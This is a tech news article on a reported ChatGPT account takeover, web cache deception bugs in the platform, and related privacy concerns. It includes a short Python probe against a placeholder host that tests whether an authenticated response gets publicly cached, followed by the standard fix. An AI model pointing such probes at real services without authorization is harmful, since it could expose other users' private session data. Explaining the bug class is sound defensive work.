OpenAI addresses ChatGPT account security breach
What looked like glitching chat histories on ChatGPT was actually something far worse.
OpenAI has confirmed an incident involving unauthorized access to a ChatGPT user’s account, raising fresh questions about the security of its platform.
According to reports, the breach, initially thought to be an internal glitch revealing chat histories to unrelated users, was actually the result of a targeted account takeover.
This incident, along with the recent AI-generated deepfakes of Taylor Swift, has sparked a broader conversation about the security measures in place for AI-powered platforms and the need for stronger user protections.
Here’s what happened with ChatGPT
The breach came to light when a user from Brooklyn, New York, noticed unfamiliar chat histories appearing in his ChatGPT account.
OpenAI’s investigation revealed that these unauthorized accesses originated from Sri Lanka, suggesting a deliberate attempt to compromise the account.
“From what we discovered, we consider it an account take over in that it’s consistent with activity we see where someone is contributing to a ‘pool’ of identities that an external community or proxy server uses to distribute free access,” an OpenAI spokesperson wrote to Ars Technica. “The investigation observed that conversations were created recently from Sri Lanka. These conversations are in the same time frame as successful logins from Sri Lanka.”
Despite the user’s confidence in the strength of his password, the incident underscores the sophistication of methods used by attackers to gain unauthorized access.
Technical vulnerabilities exposed
Further examination revealed that the ChatGPT platform contained several serious vulnerabilities that could be exploited to take over accounts and view sensitive chat histories.
Among these was a critical web cache deception bug that allowed attackers to harvest user credentials, including names, emails, and access tokens.
This discovery points to a pressing need for OpenAI to reinforce its security measures and address potential loopholes that could be exploited by cybercriminals.
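Web cache deception is worth unpacking for a second. In this class of bug, a logged-in victim is lured to a URL with a static-looking suffix tacked onto a private endpoint. If the origin server ignores the extra path segment but a CDN caches the response because “.css” looks like a stylesheet, the victim’s private data lands in a public cache for anyone to fetch. Here’s a minimal Python sketch of how a researcher might probe for that pattern. To be clear, the base URL, endpoint, and cookie name below are hypothetical stand-ins for illustration, not OpenAI’s actual API:

```python
# Minimal web cache deception probe (illustrative only).
# BASE, SESSION_ENDPOINT, and the "session" cookie name are
# hypothetical stand-ins; this is not OpenAI's actual API.
import requests

BASE = "https://example.com"
SESSION_ENDPOINT = "/api/auth/session"  # returns private user data as JSON


def probe_cache_deception(session_cookie: str) -> bool:
    """Return True if an authenticated response appears publicly cached."""
    # A static-looking suffix appended to a dynamic, authenticated endpoint.
    # A vulnerable origin ignores the extra path segment and still returns
    # the private body, while the CDN caches it because ".css" looks static.
    url = f"{BASE}{SESSION_ENDPOINT}/nonexistent.css"

    # Step 1: the "victim" requests the URL while logged in,
    # potentially seeding the cache with their private response.
    victim = requests.get(url, cookies={"session": session_cookie})

    # Step 2: the "attacker" requests the same URL with no credentials.
    # Getting the victim's body back means the cache served private data.
    attacker = requests.get(url)

    return attacker.ok and attacker.text == victim.text
```

The usual fix is twofold: the origin should return an error for unexpected path suffixes instead of silently serving the private page, and the cache should honor Cache-Control headers rather than keying cacheability off the URL extension alone.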
Privacy concerns and industry response
Now, keep in mind: this isn’t the first time something like this has happened.
Privacy concerns were serious enough that OpenAI added an incognito mode to ChatGPT last year. It stops new conversations from being saved to your chat history, though OpenAI still retains them for 30 days before deleting them.
In response to growing concerns, companies, including prominent tech giants, have begun to limit or restrict their employees’ use of ChatGPT and similar platforms, aiming to mitigate the risk of proprietary or sensitive data leakage.
One notable name is Samsung, which banned generative AI tools like ChatGPT in May 2023 after employees leaked internal source code by pasting it into the chatbot.
OpenAI’s response
The tech community has responded with a mixture of concern and calls for increased vigilance in the use of AI services, emphasizing the importance of removing personal details from interactions wherever possible.
OpenAI has acknowledged the incident and is reportedly taking steps to investigate and fortify its security protocols to prevent similar breaches in the future.
Yup, we’ve heard that before, but let’s hope they mean it this time.